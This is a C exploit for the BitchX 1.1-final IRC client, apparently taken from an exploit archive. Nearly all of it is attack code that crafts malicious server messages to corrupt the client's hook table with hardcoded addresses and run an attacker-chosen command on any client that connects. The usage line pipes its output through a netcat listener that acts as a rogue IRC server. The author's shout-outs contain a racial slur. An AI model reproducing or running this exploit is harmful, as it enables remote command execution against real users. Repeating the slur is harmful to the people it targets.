BitchX 1.1-final (EXEC) Remote Command Execution Exploit

========================================================
BitchX 1.1-final (EXEC) Remote Command Execution Exploit
========================================================

/*	Name: PBXS - Pointless BitchX Sploit
 * 	Author: clarity_
 *	Infected Versions: 1.1-final and others?
 *	Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one
 *				can inject data structures allowing for the remote execution of commands!
 *	Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx
 *			version connects to the mischievous server "ps -aux" will be executed.
 *	Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet
 */

// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org
#define HOOK_FUNCTIONS 0x81366e0
#define NICKNAME 0x8155353
#define STAR 0x8108f34

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define NICK_STR ":bleh!i"
#define NICK_STR2 "@svun.powns.net NICK :"
#define EXEC_STR "EXEC $1-"
#define RAW_FMT_STR ":my_server -%u bleh :%s"

typedef struct {
	unsigned int	hook_functions,
		nickname,
		star;
	unsigned int base, diff, offset;
} Addresses;

/* Partial structs full struct w/ correct values found in include/struct.h */
// To be loaded into nickname static
typedef struct {
    unsigned int name; // point to hook
    unsigned int list;
	// EXEC $1- 2 words
} HookFunc;

// To be loaded into joined_nick static
typedef struct {
//    unsigned int next;		/* struct hook_stru *next; */
    unsigned int nick; 		/* char *nick; */		//star
    unsigned int stuff;		/* char *stuff; */
	unsigned int shit;
} Hook;

char * make_nickname(Addresses *addrs, int X, int Y) {
	char *tmp = NULL, *sp = NULL;
	int i;
	HookFunc h;
	Hook hk;

	// malloc
	tmp = (char *) malloc(1024);

	// BASE
	h.name = addrs->star;
	h.list = addrs->base - addrs->diff - 4;

	if (Y) {
		// start loading string
		if (X == 4) {
			strcpy(tmp, NICK_STR);
		}
		else {
			strcpy(tmp, ":");
			strcat(tmp, make_nickname(addrs, X + 1, 0));
			strcat(tmp, "!i");
		}

		sp = tmp + strlen(tmp); // point to char after tmp
		//*sp++ = '0' + X;
		strcpy(sp, NICK_STR2);
	}
	else {
		sp = tmp;
		*tmp = '\0';
	}

    hk.nick = addrs->star;
    hk.stuff = addrs->base + 8;  // "stuff" is loaded after the nick

    // load str
    sp = tmp + strlen(tmp); // point to char after tmp

    memcpy(sp, &hk, sizeof(Hook));
   sp += sizeof(Hook) - 4;

	if (X != 4) {
		while (X--) {
			*sp++ = 'X';
		}
		*sp++ = '\0';
		return tmp;
	}
	else {
		while (X--) {
			*sp++ = 'X';
		}
	}


	// pad
	if (sizeof(Hook) > addrs->diff) {
		printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff);
	}

	for (i = sizeof(Hook); i < addrs->diff; ++i)
		*sp++ = 'x';

	memcpy(sp, &h, sizeof(HookFunc));
	sp += sizeof(HookFunc);
	memcpy(sp, EXEC_STR, strlen(EXEC_STR));
	--sp[4];
	sp += strlen(EXEC_STR);
	*++sp = '\0';

	return tmp;
}

//#define RAW_FMT_STR ":my_server %d bleh :%s"
char * make_raw(Addresses *addrs, char *cmd) {
	char *tmp = NULL;
	unsigned int len;

	len = 2000; // fix later
	tmp = (char *) malloc(len);

	sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd);

	return tmp;
}

int main(int argc, char **argv) {
	Addresses addrs;
	char *cmd = argv[1];

	addrs.hook_functions = HOOK_FUNCTIONS;
	addrs.nickname = NICKNAME;
	addrs.star = STAR;

	addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1;
	addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20);
	addrs.base = NICKNAME + addrs.diff;

	printf(":my_server 001 bleh :a\n");
	printf("%s\n", make_nickname(&addrs, 4, 1));
	printf("%s\n", make_nickname(&addrs, 3, 1));
	printf("%s\n", make_nickname(&addrs, 2, 1));
	printf("%s\n", make_nickname(&addrs, 1, 1));
	printf("%s\n", make_nickname(&addrs, 0, 1));
	printf("%s\n", make_raw(&addrs, cmd));

	return 0;
}



#  0day.today [2018-04-01]  #